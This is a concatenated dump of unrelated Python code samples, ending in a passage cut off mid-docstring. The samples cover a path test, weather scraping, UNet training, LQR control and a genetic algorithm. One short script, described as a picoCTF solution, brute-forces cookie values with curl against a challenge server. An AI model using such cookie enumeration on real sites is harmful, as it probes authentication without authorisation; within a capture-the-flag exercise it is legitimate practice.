        # is_subdir appears to return (bool, relative_path).
        os.makedirs(os.path.join(self.temp_dir.name, 'a', 'b'))
        os.makedirs(os.path.join(self.temp_dir.name, 'c', 'd'))

        ans = is_subdir(os.path.join(self.temp_dir.name, 'a', 'b'),
                        self.temp_dir.name)
        self.assertTrue(ans[0])
        self.assertEqual(ans[1], os.path.join('a', 'b'))

        # '.' components are normalized away.
        ans = is_subdir(os.path.join(self.temp_dir.name, 'a', '.', 'b'),
                        self.temp_dir.name)
        self.assertTrue(ans[0])
        self.assertEqual(ans[1], os.path.join('a', 'b'))

        # '..' components are normalized away.
        ans = is_subdir(os.path.join(self.temp_dir.name, 'q', '..', 'a', 'b'),
                        self.temp_dir.name)
        self.assertTrue(ans[0])
        self.assertEqual(ans[1], os.path.join('a', 'b'))

        ans = is_subdir(os.path.join(self.temp_dir.name, 'a'),
                        self.temp_dir.name)
        self.assertTrue(ans[0])
        self.assertEqual(ans[1], 'a')

        # A directory is its own subdirectory ('.').
        ans = is_subdir(self.temp_dir.name,
                        self.temp_dir.name)
        self.assertTrue(ans[0])
        self.assertEqual(ans[1], ".")

        # Parent is not a subdir; relative path still reported.
        ans = is_subdir(self.temp_dir.name,
                        os.path.join(self.temp_dir.name, 'a'))
        self.assertFalse(ans[0])
        self.assertEqual(ans[1], "..")

        ans = is_subdir(os.path.join(self.temp_dir.name, 'a', 'b'),
                        os.path.join(self.temp_dir.name, 'c', 'd'))
        self.assertFalse(ans[0])
        self.assertEqual(ans[1], os.path.join('..', '..', 'a', 'b'))

        # Symlink handling (POSIX only): third argument toggles whether
        # links are resolved before comparison.
        if os.name != 'nt':
            os.symlink(os.path.join(self.temp_dir.name, 'a', 'b'),
                       os.path.join(self.temp_dir.name, 'e'))
            ans = is_subdir(os.path.join(self.temp_dir.name, 'e'),
                            os.path.join(self.temp_dir.name, 'a'))
            self.assertTrue(ans[0])
            self.assertEqual(ans[1], 'b')
            ans = is_subdir(os.path.join(self.temp_dir.name, 'e'),
                            os.path.join(self.temp_dir.name, 'a'), False)
            self.assertFalse(ans[0])
            self.assertEqual(ans[1], os.path.join('..', 'e'))
| StarcoderdataPython |
3277144 | <reponame>GerdED/football<filename>experiment.py
trial...
| StarcoderdataPython |
4822772 | # Collect weather data for predetermined cities
# these are the corresponding cities with:
# - wind
# - solar
# - weather data exists on openweather api
import json
import requests
import pandas as pd
from time import time, sleep
from datetime import datetime
def writeData(title, timetext, data):
    """Append *data* as pretty-printed JSON to '<title>_<timetext>.json'.

    The file is opened in append mode, so each call adds one JSON document
    to the file in the current working directory.
    """
    outname = f'{title}_{timetext}.json'
    with open(outname, 'a') as out:
        json.dump(data, out, ensure_ascii=False, indent=2)
# Polling cadence: one full pass every 15 minutes, with a short pause
# between individual API requests to stay under rate limits.
long_wait = 15*60 # 15 * 60 seconds
short_wait = 5 # 5 seconds
# OpenWeatherMap endpoints; the APPID placeholder must be replaced with a
# real API key for requests to succeed.
currentWeatherUrl='http://api.openweathermap.org/data/2.5/weather?q={}&APPID=asdfasdfasdgasdfasa_get_your_own_key'
forecastWeatherUrl='http://api.openweathermap.org/data/2.5/forecast?q={}&APPID=asdfasdfasdgasdfasa_get_your_own_key'
# German station names; the ASCII variants are the ones actually queried
# (the UTF-8 tuple is kept for reference and is otherwise unused here).
citiesUTF8 = ('Bremen','Chemnitz','Fichtelberg','Fürstenzell','Görlitz','Hamburg-Fuhlsbüttel','Hohenpeißenberg',\
              'Konstanz','Lindenberg','Norderney','Potsdam','Rostock-Warnemünde','Saarbrücken-Ensheim',\
              'Schleswig','Seehausen','Stuttgart (Schnarrenberg)','Trier-Petrisberg','Würzburg')
citiesASCII = ('Bremen','Chemnitz','Fichtelberg','Furstenzell','Gorlitz','Hamburg', 'Hohenpeissenberg',\
               'Konstanz','Lindenberg','Norderney','Potsdam','Rostock' ,'Saarbrucken',\
               'Schleswig','Seehausen','Stuttgart', 'Trier', 'Wuerzburg')
cities = citiesASCII
# Endless collection loop: each pass fetches current weather and forecast
# for every city, dumps both to timestamped JSON files, then sleeps.
while True:
    currData = {}
    forecastData = {}
    timetext = datetime.fromtimestamp(time()).strftime('%Y%m%d_%H%M%S')
    for city in cities:
        response = requests.get(currentWeatherUrl.format(city + ',DE'))
        responseOut = {}
        if response:
            responseOut = response.json()
            timenow = datetime.fromtimestamp(time()).strftime('%H:%M:%S')
            print(f'Retrieved current weather for city={city} at {timenow}')
        else:
            # Failed request: record an empty dict for this city.
            print(f'Could not retreive current weather for city={city}')
        currData[city] = responseOut
        sleep(short_wait)
        response = requests.get(forecastWeatherUrl.format(city + ',DE'))
        responseOut = {}
        if response:
            responseOut = response.json()
            timenow = datetime.fromtimestamp(time()).strftime('%H:%M:%S')
            print(f'Retrieved forecast weather for city={city} at {timenow}')
        else:
            print(f'Could not retreive current weather for city={city}')
        forecastData[city] = responseOut
        sleep(short_wait)
    # dump data
    writeData('curr',timetext,currData)
    writeData('fore',timetext,forecastData)
    # wait till next
    # Subtract the per-request pauses already spent so passes start roughly
    # every long_wait seconds.
    sleep(long_wait - 2*len(cities)*short_wait)
| StarcoderdataPython |
80732 | # pylint: disable=missing-docstring
from distutils.core import setup
# Package metadata for the NotiCast IoT core distribution.
# NOTE(review): distutils is deprecated (removed in Python 3.12) and its
# ``setup`` ignores ``install_requires`` (a setuptools feature) -- consider
# migrating to setuptools.
setup(
    name='noticast-iot-core',
    version='0.1-dev',
    packages=['noticast'],
    install_requires=['AWSIoTPythonSDK', 'requests', 'raven'])
144935 | <reponame>chul0721/deliverables_presentation
from urllib.parse import quote
import requests
import json
import random
import time
boongi = input() # read the release period (season/quarter) filter from the user
encoding = quote(boongi)
header = {'laftel' : 'TeJava'}
# Discover endpoint filtered by the URL-encoded 'years' value.
laftel_API = 'https://laftel.net/api/search/v1/discover/?years=' + str(encoding)
# NOTE(review): 'next' shadows the builtin of the same name.
next = ""
print ("==============================")
# Follow the API's pagination: print every result name, then move to the
# 'next' page URL until the API reports no further page.
while(True):
    response = requests.get(url = laftel_API, headers = header)
    # NOTE(review): this rebinds the imported 'json' module name to the
    # decoded response dict on each iteration.
    json = response.json()
    results = json["results"]
    for x in results:
        print(x["name"])
    next = json["next"]
    if (next is not None):
        laftel_API = next
    else:
        break
    # Small random delay between page fetches.
    time.sleep(random.randint(1, 2))
print ("==============================")
3389777 | <reponame>Wayne2Wang/Pytorch-minModel
import os
import time
from tqdm import tqdm
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.datasets as datasets
from torch.utils.data import DataLoader
from torchvision import transforms
from torch.utils.tensorboard import SummaryWriter
from torchsummary import summary
from torchvision.transforms import InterpolationMode
from torch.nn.functional import one_hot
from unet import Unet
import checkpoint
# Cityscapes semantic-class palette: PALETTE[class_id] -> (R, G, B).
PALETTE = [( 0, 0, 0),( 0, 0, 0),( 0, 0, 0),( 0, 0, 0),( 0, 0, 0),
           (111, 74, 0),( 81, 0, 81),(128, 64,128),(244, 35,232),(250,170,160),
           (230,150,140),( 70, 70, 70),(102,102,156),(190,153,153),(180,165,180),
           (150,100,100),(150,120, 90),(153,153,153),(153,153,153),(250,170, 30),
           (220,220, 0),(107,142, 35),(152,251,152),( 70,130,180),(220, 20, 60),
           (255, 0, 0),( 0, 0,142),( 0, 0, 70),( 0, 60,100),( 0, 0, 90),
           ( 0, 0,110),( 0, 80,100),( 0, 0,230),(119, 11, 32),( 0, 0,142)]

def save_img(img, title, dir):
    """Save a CHW image tensor as ``<dir>/<title>.png`` with *title* as caption.

    Parameters
    ----------
    img : torch.Tensor
        Image tensor of shape (C, H, W); permuted to HWC for matplotlib.
    title : str
        Plot caption; also used as the output file name.
    dir : str
        Output directory (parameter name kept for backward compatibility
        even though it shadows the ``dir`` builtin).
    """
    plt.figure(figsize=(6, 6))
    plt.imshow(torch.permute(img, (1, 2, 0)))
    plt.axis('off')
    plt.title(title, y=-0.16, fontsize=10)
    plt.savefig(os.path.join(dir, title + '.png'), bbox_inches='tight', pad_inches=0)
    plt.close()

def pred2color(pred, integer=False):
    """Convert a segmentation prediction into an RGB image in [0, 1].

    Parameters
    ----------
    pred : torch.Tensor
        Either class scores of shape (num_classes, H, W) (``integer=False``,
        argmax taken over dim 0) or an integer class map of shape (H, W)
        (``integer=True``).
    integer : bool
        Set True when ``pred`` already contains class indices.

    Returns
    -------
    torch.Tensor
        Float tensor of shape (3, H, W) with values in [0, 1].
    """
    if not integer:
        pred = torch.argmax(pred, dim=0)
    # Vectorized palette lookup replaces the original per-pixel Python double
    # loop: index the (num_classes, 3) palette with the (H, W) class map,
    # then move the channel axis to the front.
    palette = torch.tensor(PALETTE, dtype=torch.float)
    color = palette[pred].permute(2, 0, 1)
    return color / 255
# Hyper-parameters
device = "cuda" if torch.cuda.is_available() else "cpu"
lr = 3e-4
lr_step_size = 10  # epochs between learning-rate decays
lr_gamma = 0.2     # multiplicative LR decay factor
weight_decay = 0.01
batch_size = 2
num_epochs = 50
# Input images are Cityscapes frames (2048x1024) downscaled by a factor of 2.
img_height, img_width, img_channels = 1024//2, 2048//2, 3
# Label maps use their own spatial size; 35 semantic classes.
label_height, label_width, label_dim = 324, 836, 35
img_dim = img_height*img_width*img_channels
img_dim_str = '({},{},{})'.format(img_height, img_width, img_channels)
label_dim_str = '({},{},{})'.format(label_height, label_width, label_dim)
# Load dataset; img size = 2048*1024*3
i_trans = transforms.Compose([
    transforms.ToTensor(),
    transforms.Resize((img_height,img_width), interpolation=InterpolationMode.BILINEAR)
])
t_trans = transforms.Compose([
    transforms.ToTensor(),
    # Nearest-neighbour so class ids are not interpolated into invalid values.
    transforms.Resize((label_height,label_width), interpolation=InterpolationMode.NEAREST)
])
dataset = datasets.Cityscapes(root="../../datasets/Cityscapes/", transform=i_trans, target_transform=t_trans,\
    split='train',mode='fine', target_type='semantic')
loader = DataLoader(dataset, batch_size=batch_size, shuffle=False, drop_last=False)
# Initialize model and optimizer
model = Unet(img_channels, label_dim).to(device)
#summary(model, (3,1024,512), device=device)
# Initialize optimizer, lr scheduler, and loss function
opt = optim.AdamW(model.parameters(), lr=lr, weight_decay=weight_decay)
scheduler = optim.lr_scheduler.StepLR(opt, step_size=lr_step_size, gamma=lr_gamma)
criterion = nn.CrossEntropyLoss()
# Build result directory
writer = SummaryWriter("logs/")
save_img_dir = "images/sample"
if not os.path.exists(save_img_dir):
    os.makedirs(save_img_dir)
path_to_model = 'logs/checkpoints/'
# The image to evaluate after each epoch, save it and its label to the image folder (label needs to be unnormalized)
# NOTE(review): ToTensor scales labels to [0, 1]; the *255 below undoes that
# to recover integer class ids -- confirm labels really are 8-bit ids.
sample_img = dataset[0][0].unsqueeze(0).to(device)
save_img(dataset[0][0], 'RGB Image', save_img_dir)
save_img(pred2color((dataset[0][1]*255).to(torch.long).squeeze(0), integer=True), 'Gound Truth', save_img_dir)
# Start training
start_time = time.time()
print('Start training: epoch={}, batch_size={}, lr={}, lr_step_size={}, lr_gamma={},\n\
weight_decay={}, img_dim={}, label_dim={}, device={}'\
.format(num_epochs, batch_size, lr,lr_step_size,lr_gamma, weight_decay, img_dim_str, label_dim_str, device))
for epoch in range(num_epochs):
    # Sample images: render the model's current prediction for the fixed
    # sample image before training this epoch.
    with torch.no_grad():
        sample_label = model(sample_img).squeeze(0).cpu()
        save_img(pred2color(sample_label), 'Epoch {}'.format(epoch), save_img_dir)
    # Train for an epoch
    for batch_id, (img, label) in tqdm(enumerate(loader), ascii=True, desc='Epoch {}/{}'\
        .format(epoch+1, num_epochs),total=len(loader)):
        # Move to GPU if available
        img = img.to(device)
        label = (label*255).to(torch.long).squeeze(1).to(device)
        # Prediction
        pred = model(img)
        # Calculate loss and backprop
        loss = criterion(pred, label)
        model.zero_grad()
        loss.backward()
        opt.step()
    # Step lr scheduler
    scheduler.step()
    # Evaluate after one epoch
    # NOTE(review): `loss` here is the last batch's loss, not an epoch average.
    print("loss={:.4f}, time={:.2f}".format(loss,time.time()-start_time))
    writer.add_scalar('Loss/train', loss, epoch)
    # Save model for every epoch
    checkpoint.save_checkpoint(path_to_model, 'unet_{}.pt'.format(epoch), model, epoch, opt, scheduler, loss.item())
print('Training finished: time={:.2f}, final loss={:.4f}'\
    .format(time.time()-start_time, loss))
| StarcoderdataPython |
def get_diagonale_code(grid: str) -> str:
    """Walk *grid* (rows of whitespace-separated tokens, one row per line)
    along a zig-zag diagonal and concatenate the visited tokens.

    The walk starts at the top-left cell, moves one column right per step,
    and bounces vertically between the last and the first row.  It stops --
    returning everything collected so far -- as soon as it steps outside
    the grid.
    """
    rows = [line.split() for line in grid.split("\n")]
    moving_down = True
    code = ""
    x = 0
    y = 0
    while True:
        try:
            code += rows[y][x]
        except IndexError:
            # Walked off the grid: the diagonal is complete.
            # (Fix: the original used a bare ``except:``; only this lookup
            # can raise, and only IndexError, so catch exactly that.)
            return code
        # Bounce at the bottom row; resume downwards after touching the top.
        if y == len(rows) - 1:
            moving_down = False
        elif y == 0 and not moving_down:
            moving_down = True
        y += 1 if moving_down else -1
        x += 1
164405 | <gh_stars>0
# Quick and dirty script to send cookies to a URL using python, used for a
# picoCTF challenge: try every cookie value in [0, 30) and append each
# response to result.txt.
import os

# Number you want to go up to; raise the bound to widen the search.
UPPER_BOUND = 30


def command(i):
    """Fetch the check page with cookie ``name=<i>`` and append the body to result.txt."""
    os.system("curl -v --cookie \"name={0}\" "
              "http://mercury.picoctf.net:17781/check >> result.txt".format(i))


# Fix: the original `while i != 30` loop defined command() without ever
# calling it and never advanced `i`, so it looped forever doing nothing.
for i in range(UPPER_BOUND):
    command(i)

os.system("clear")
print("Results saved to 'result.txt'")
3236687 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pvtol_lqr.m - LQR design for vectored thrust aircraft
# RMM, 14 Jan 03
#
# This file works through an LQR-based design problem for the planar
# vertical take-off and landing (PVTOL) aircraft example from Astrom and
# Murray, Chapter 5, using the basic functionality of the Python control
# package.
#
from numpy import * # NumPy functions
from matplotlib.pyplot import * # MATLAB-style plotting functions
from control.matlab import * # MATLAB-like functions
#
# System dynamics
#
# Dynamics of the PVTOL system in state-space form
#
# System parameters
m = 4; # mass of the aircraft
J = 0.0475; # inertia about the pitch axis
r = 0.25; # distance to the center of force
g = 9.8; # gravitational constant
c = 0.05; # damping coefficient (estimated)
# State space for the dynamics
xe = [0, 0, 0, 0, 0, 0]; # equilibrium point
ue = [0, m*g]; # (note that these are lists, not matrices)
# Dynamics matrix (use matrix type so that * works)
A = matrix(
    [[ 0, 0, 0, 1, 0, 0],
     [ 0, 0, 0, 0, 1, 0],
     [ 0, 0, 0, 0, 0, 1],
     [ 0, 0, (-ue[0]*sin(xe[2]) - ue[1]*cos(xe[2]))/m, -c/m, 0, 0],
     [ 0, 0, (ue[0]*cos(xe[2]) - ue[1]*sin(xe[2]))/m, 0, -c/m, 0],
     [ 0, 0, 0, 0, 0, 0 ]])
# Input matrix
B = matrix(
    [[0, 0], [0, 0], [0, 0],
     [cos(xe[2])/m, -sin(xe[2])/m],
     [sin(xe[2])/m, cos(xe[2])/m],
     [r/J, 0]])
# Output matrix
C = matrix([[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0]])
D = matrix([[0, 0], [0, 0]])
#
# Construct inputs and outputs corresponding to steps in xy position.
# The vectors xd and yd correspond to the desired equilibrium states of
# the system.  The matrices Cx and Cy are the corresponding outputs.
#
# These vectors are used to compute the closed-loop dynamics as
#
#   xdot = Ax + B u  =>  xdot = (A-BK)x + K xd
#   u = -K(x - xd)       y = Cx
#
# The closed-loop dynamics can be simulated with the "step" command,
# using K * xd as the input vector (assuming the "input" is unit size,
# with xd corresponding to the desired steady state).
#
xd = matrix([[1], [0], [0], [0], [0], [0]]);
yd = matrix([[0], [1], [0], [0], [0], [0]]);
#
# Extract the relevant dynamics for use with the SISO library.
#
# The current python-control library only supports SISO transfer
# functions, so parts of the original MATLAB code are modified here to
# extract SISO systems.  To do this, the "lat" and "alt" index vectors
# select the states related to the lateral (x) and altitude (y) dynamics.
#
# Indices of the state variables we use
lat = (0,2,3,5);
alt = (1,4);
# Decoupled dynamics
Ax = (A[lat, :])[:, lat]; #! not sure why it has to be done this way!
Bx = B[lat, 0]; Cx = C[0, lat]; Dx = D[0, 0];
Ay = (A[alt, :])[:, alt]; #! not sure why it has to be done this way!
By = B[alt, 1]; Cy = C[1, alt]; Dy = D[1, 1];
# Plot labels
clf();
suptitle("LQR controllers for vectored thrust aircraft (pvtol-lqr)")
#
# LQR design
#
# Diagonal weighting matrices
Qx1 = diag([1, 1, 1, 1, 1, 1]);
Qu1a = diag([1, 1]);
(K, X, E) = lqr(A, B, Qx1, Qu1a); K1a = matrix(K);
# Close the loop: xdot = Ax - B K (x-xd)
# Note: in python-control this input has to be given all at once
# H1a = ss(A-B*K1a, B*K1a*concatenate((xd, yd), axis=1), C, D)
# (T, Y) = step(H1a, T=linspace(0,10,100));
# Step response for the first input
# NOTE(review): hold() was removed in matplotlib >= 3.0 -- this script
# targets an old matplotlib; confirm the pinned version before running.
H1ax = ss(Ax - Bx*K1a[0,lat], Bx*K1a[0,lat]*xd[lat,:], Cx, Dx);
(Yx, Tx) = step(H1ax, T=linspace(0,10,100));
# Step response for the second input
H1ay = ss(Ay - By*K1a[1,alt], By*K1a[1,alt]*yd[alt,:], Cy, Dy);
(Yy, Ty) = step(H1ay, T=linspace(0,10,100));
subplot(221); title("Identity weights")
# plot(T, Y[:,1, 1], '-', T, Y[:,2, 2], '--'); hold(True);
plot(Tx.T, Yx.T, '-', Ty.T, Yy.T, '--'); hold(True);
plot([0, 10], [1, 1], 'k-'); hold(True);
axis([0, 10, -0.1, 1.4]);
ylabel('position');
legend(('x', 'y'), loc='lower right');
# Look at different input weightings
Qu1a = diag([1, 1]); (K1a, X, E) = lqr(A, B, Qx1, Qu1a);
H1ax = ss(Ax - Bx*K1a[0,lat], Bx*K1a[0,lat]*xd[lat,:], Cx, Dx);
Qu1b = (40**2)*diag([1, 1]); (K1b, X, E) = lqr(A, B, Qx1, Qu1b);
H1bx = ss(Ax - Bx*K1b[0,lat], Bx*K1b[0,lat]*xd[lat,:],Cx, Dx);
Qu1c = (200**2)*diag([1, 1]); (K1c, X, E) = lqr(A, B, Qx1, Qu1c);
H1cx = ss(Ax - Bx*K1c[0,lat], Bx*K1c[0,lat]*xd[lat,:],Cx, Dx);
[Y1, T1] = step(H1ax, T=linspace(0,10,100));
[Y2, T2] = step(H1bx, T=linspace(0,10,100));
[Y3, T3] = step(H1cx, T=linspace(0,10,100));
subplot(222); title("Effect of input weights")
plot(T1.T, Y1.T, 'b-'); hold(True);
plot(T2.T, Y2.T, 'b-'); hold(True);
plot(T3.T, Y3.T, 'b-'); hold(True);
plot([0 ,10], [1, 1], 'k-'); hold(True);
axis([0, 10, -0.1, 1.4]);
# arcarrow([1.3, 0.8], [5, 0.45], -6);
text(5.3, 0.4, 'rho');
# Output weighting - change Qx to use outputs
Qx2 = C.T * C;
Qu2 = 0.1 * diag([1, 1]);
(K, X, E) = lqr(A, B, Qx2, Qu2); K2 = matrix(K)
H2x = ss(Ax - Bx*K2[0,lat], Bx*K2[0,lat]*xd[lat,:], Cx, Dx);
H2y = ss(Ay - By*K2[1,alt], By*K2[1,alt]*yd[alt,:], Cy, Dy);
subplot(223); title("Output weighting")
[Y2x, T2x] = step(H2x, T=linspace(0,10,100));
[Y2y, T2y] = step(H2y, T=linspace(0,10,100));
plot(T2x.T, Y2x.T, T2y.T, Y2y.T)
ylabel('position');
xlabel('time'); ylabel('position');
legend(('x', 'y'), loc='lower right');
#
# Physically motivated weighting
#
# Decide on the relevant errors: 1 cm error in x, 10 cm error in y.
# Keep the angle to within roughly 5 degrees.
# Penalize side forces because of the loss in efficiency.
#
Qx3 = diag([100, 10, 2*pi/5, 0, 0, 0]);
Qu3 = 0.1 * diag([1, 10]);
(K, X, E) = lqr(A, B, Qx3, Qu3); K3 = matrix(K);
H3x = ss(Ax - Bx*K3[0,lat], Bx*K3[0,lat]*xd[lat,:], Cx, Dx);
H3y = ss(Ay - By*K3[1,alt], By*K3[1,alt]*yd[alt,:], Cy, Dy);
subplot(224)
# step(H3x, H3y, 10);
[Y3x, T3x] = step(H3x, T=linspace(0,10,100));
[Y3y, T3y] = step(H3y, T=linspace(0,10,100));
plot(T3x.T, Y3x.T, T3y.T, Y3y.T)
title("Physically motivated weights")
xlabel('time');
legend(('x', 'y'), loc='lower right');
show()
| StarcoderdataPython |
1602304 | from grapl_analyzerlib.grapl_client import GraphClient
from grapl_analyzerlib.prelude import (
BaseView,
)
from graplinc.grapl.api.graph.v1beta1.types_pb2 import MergedNode
def view_from_proto(graph_client: GraphClient, node: MergedNode) -> BaseView:
    """Build a BaseView wrapping *node*, backed by *graph_client*."""
    # The merged node carries one concrete type; BaseView expects a set.
    type_set = {node.node_type}
    return BaseView(
        node.uid,
        node.node_key,
        graph_client,
        node_types=type_set,
    )
| StarcoderdataPython |
4805555 | import unittest
import pandas as pd
from Parsers.Onlineparser import OnlineParser
from Parsers.csv_parser import CsvParser
from Processing.SingleColumnConcer import DataframeConcer
class MyTestCase(unittest.TestCase):
    """Regression tests comparing parser output against stored CSV snapshots."""

    def test_online_table(self):
        """Scraped RIVM air-quality tables must match the saved snapshots.

        NOTE(review): depends on the live RIVM website -- a site change
        breaks this test, as the failure messages below indicate.
        """
        self.assertEqual(OnlineParser("https://www.rivm.nl/media/milieu-en-leefomgeving/hoeschoonisonzelucht/",
                                      "Groningen").get_data_frame().iloc[:, [2, 3]].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/Onlinetester_groningen.csv', index_col=0).sum(numeric_only=True).sum(), msg="The site might have been changed for Groningen")
        self.assertEqual(OnlineParser("https://www.rivm.nl/media/milieu-en-leefomgeving/hoeschoonisonzelucht/",
                                      "Flevoland").get_data_frame().iloc[:, [2, 3]].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/Onlinetester_flevoland.csv', index_col=0).sum(numeric_only=True).sum(), msg="The site might have been changed for Flevoland")

    def test_csv_parser(self):
        """CSV parser column sums must match the saved per-province snapshots."""
        self.assertEqual(CsvParser('Data/03759ned_UntypedDataSet_07022020_153926.csv',
                                   "Groningen").get_data_frame().iloc[:, [2, 6]][1:].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/CsvTester_groningen.csv', index_col=0)['Leeftijd'].sum(), msg="Csv Parser is not working for Groningen")
        self.assertEqual(CsvParser('Data/03759ned_UntypedDataSet_07022020_153926.csv',
                                   "Flevoland").get_data_frame().iloc[:, [2, 6]][1:].sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/CsvTester_flevoland.csv', index_col=0)['Leeftijd'].sum(), msg="Csv Parser is not working for Flevoland")

    def test_column_concer(self):
        """Concatenating a frame with itself must match the stored snapshot sum."""
        self.assertEqual(DataframeConcer(CsvParser('Data/70262ned_UntypedDataSet_05022020_180935.csv',
                                                   "Groningen").get_data_frame().iloc[:, [1, 3, 4]], CsvParser('Data/70262ned_UntypedDataSet_05022020_180935.csv',
                                                   "Groningen").get_data_frame().iloc[:, [1, 3, 4]]).get_data_frame().sum(numeric_only=True).sum(), pd.read_csv('Unittest/UnittestComparisonData/Concertester_groningen.csv').sum(numeric_only=True).sum(), msg="Something is not adding up...")

if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
15570 | <filename>modules/util/objects/query_parts/postgres_query_part.py
class PostgresQueryPart:
    """Base object representing one composable part of a Postgres query.

    Concrete subclasses are expected to override :meth:`get_query`.
    """

    def get_query(self) -> str:
        """Render this query part as SQL text.

        Returns:
            str: the SQL fragment.  NOTE(review): this base implementation
            is a stub and actually returns ``None``; subclasses must
            override it.
        """
        pass
| StarcoderdataPython |
1604140 | <reponame>aspferraz/GeneticAlgorithm
'''
File name: main.py
Author: <NAME>
Date created: 11/20/2020
Date last modified: 11/25/2020
Python Version: 3.8
'''
import struct
import math
import numpy as np
import random
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
DEFAULT_PRECISION = 6


def float_to_bin(num):
    """Encode a float as its 32-bit IEEE-754 big-endian bit string."""
    as_uint = struct.unpack('!I', struct.pack('!f', num))[0]
    return format(as_uint, '032b')


def bin_to_float(binary):
    """Decode a 32-character bit string back into the float it encodes."""
    as_uint = int(binary, 2)
    return struct.unpack('!f', struct.pack('!I', as_uint))[0]


def rand_decision(probability):
    """Return True with the given *probability* (a single Bernoulli trial)."""
    draw = random.random()
    return draw < probability


# changes according to the problem
def fitness(x):
    """Objective f(x) = x*sin(10*pi*x) + 1 on [-1, 2]; -inf outside the domain."""
    if not -1 <= x <= 2:
        return round(float('-inf'), DEFAULT_PRECISION)
    return round(x * math.sin(10 * math.pi * x) + 1, DEFAULT_PRECISION)


def calc_population_fitness(population):
    """Evaluate every chromosome (a 32-bit string) and return a fitness array."""
    return np.array([fitness(bin_to_float(chromosome)) for chromosome in population])
def select_best_individuals(population, population_fitness, rate=0.5):
    """Return the top ``len(population) * rate`` chromosomes by fitness.

    Ties are broken by position: among equal fitness values the chromosome
    with the lower index is taken first (the same order the original
    repeated-argmax implementation produced).

    Parameters
    ----------
    population : sequence of str
        Chromosomes as 32-character bit strings.
    population_fitness : np.ndarray
        Fitness of each chromosome, aligned with ``population``.
    rate : float
        Fraction of the population to keep.

    Returns
    -------
    np.ndarray
        Array of dtype ``<U32`` holding the selected chromosomes, best first.
    """
    selected_qtt = np.uint16(len(population) * rate)
    # A stable sort on the negated fitness gives descending order with
    # first-index-wins tie-breaking in one O(n log n) pass, instead of the
    # original O(n * k) repeated argmax-and-invalidate loop.
    order = np.argsort(-np.asarray(population_fitness, dtype=float), kind='stable')
    best_individuals = np.empty(selected_qtt, dtype="<U32")
    for rank, src_idx in enumerate(order[:selected_qtt]):
        best_individuals[rank] = population[src_idx]
    return best_individuals
def select_individuals(population, population_fitness, rate=0.5):
    """Roulette-style selection of ``len(population) * rate`` parents.

    Each chromosome is accepted with probability proportional to its
    fitness relative to the current maximum; an accepted chromosome cannot
    be picked twice.  With ``rate >= 1`` the whole population is returned
    unchanged.

    NOTE(review): assumes the maximum fitness is positive and finite -- a
    non-positive or ``-inf`` maximum makes the acceptance probability
    ill-defined; confirm against the fitness function used by callers.

    Parameters
    ----------
    population : sequence of str
        Chromosomes as bit strings (at most 32 characters).
    population_fitness : np.ndarray
        Fitness of each chromosome, aligned with ``population``.
    rate : float
        Fraction of the population to select.

    Returns
    -------
    np.ndarray
        The selected chromosomes.
    """
    fitness_copy = np.copy(population_fitness)
    selected_qtt = np.uint16(len(population) * rate)
    # Bug fix: np.empty() leaves arbitrary garbage in a string array, but the
    # loop below relies on unfilled slots comparing equal to ''.  np.full
    # guarantees that invariant.
    parents = np.full(selected_qtt, '', dtype="<U32")
    if rate < 1:
        max_fitness = np.max(fitness_copy)
        population_idx = 0
        # Keep sweeping the population (wrapping around) until every parent
        # slot has been filled.
        while '' in parents:
            if population_idx == len(population):
                population_idx = 0
            current_fitness = fitness_copy[population_idx]
            if rand_decision(current_fitness / max_fitness):
                # Fill the first still-empty slot and mark the chromosome as
                # used so it cannot be selected again.
                parent_idx = np.where(parents == '')[0][0]
                parents[parent_idx] = population[population_idx]
                fitness_copy[population_idx] = float('-inf')
            population_idx += 1
    else:
        parents = np.copy(population)
    return parents
def crossover(parents, rate=0.7):
    """Single-point crossover applied to a ``rate`` fraction of *parents*.

    A random subset of positions is recombined with the next parent
    (cyclically); every other position is copied through unchanged.  The
    child's first character is the product of both parents' leading bits,
    the first half of the payload comes from the first parent and the
    second half from the second parent.
    """
    n_parents = parents.shape[0]
    chosen = set(random.sample(range(n_parents), np.uint16(n_parents * rate)))
    # Crossover point: just past the middle of the 32-character chromosome.
    point = np.uint8(len(parents[0]) / 2 + 1)
    offspring = np.empty(n_parents, dtype="<U32")
    for k in range(n_parents):
        if k not in chosen:
            offspring[k] = parents[k]
            continue
        first = parents[k % n_parents]
        second = parents[(k + 1) % n_parents]
        # Leading bit of the child = product of the parents' leading bits.
        sign = str(np.uint8(first[0]) * np.uint8(second[0]))
        offspring[k] = sign + first[1:point] + second[point:]
    return offspring
def mutation(population, rate=0.01):
    """Flip each of the 32 genes of every chromosome with probability *rate*.

    Mutates *population* (an array of 32-character bit strings) in place
    and also returns it for convenience.
    """
    for idx in range(population.shape[0]):
        for gene_idx in range(32):
            if rand_decision(rate):
                # Bug fix: re-read the chromosome on every flip.  The
                # original captured it once before the gene loop, so a
                # second mutation of the same individual was rebuilt from
                # the stale copy and silently discarded earlier flips.
                chromosome = population[idx]
                flipped = '0' if chromosome[gene_idx] == '1' else '1'
                population[idx] = chromosome[:gene_idx] + flipped + chromosome[gene_idx + 1:]
    return population
def plot_results(data_frame):
    """Plot best-fitness-over-time curves, one styled line per mutation rate."""
    # Seaborn theme first (it overwrites rcParams), then the figure size.
    sns.set(font_scale=1, rc={"lines.linewidth": 2})
    plt.rcParams["figure.figsize"] = [20, 10]
    axes = sns.lineplot(
        data=data_frame,
        x="time",
        y="best value in population",
        hue="mutation rate",
        style="mutation rate",
    )
    axes.set(yscale="log")
    plt.show()
def run(population_size, domain_limits, generations=5, model='generational', selection_rate=1.0, elitism_rate=0.1,
        crossover_rate=0.7, mutation_rate=0.01):
    """Run the genetic algorithm and return sampled best-fitness values.

    Parameters
    ----------
    population_size : int
        Number of chromosomes in the population.
    domain_limits : tuple
        (lower, upper) bounds for the initial random phenotypes.
    generations : int
        Number of generations to evolve.
    model : str
        'generational' (selection_rate must be 1) or 'steady-state'
        (selection_rate must be < 1).
    selection_rate, elitism_rate, crossover_rate, mutation_rate : float
        GA operator rates.

    Returns
    -------
